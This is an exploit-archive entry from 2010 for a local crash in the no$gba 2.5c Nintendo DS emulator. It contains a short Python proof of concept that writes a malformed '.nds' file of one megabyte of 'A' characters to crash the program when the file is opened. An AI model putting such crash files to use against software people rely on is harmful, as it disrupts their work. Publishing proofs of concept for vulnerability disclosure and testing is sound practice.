no$gba 2.5c - '.nds' Local crash



EKU-ID: 19090 CVE: OSVDB-ID:
Author: l3D Published: 2010-03-21 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


#!/usr/bin/env python
#no$gba 2.5c (.nds) local crash
#Software Link: http://nocash.emubase.de/no$gba-w.zip
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com

bad=file('crash.nds', 'w')
bad.write('A'*0x100000)
bad.close()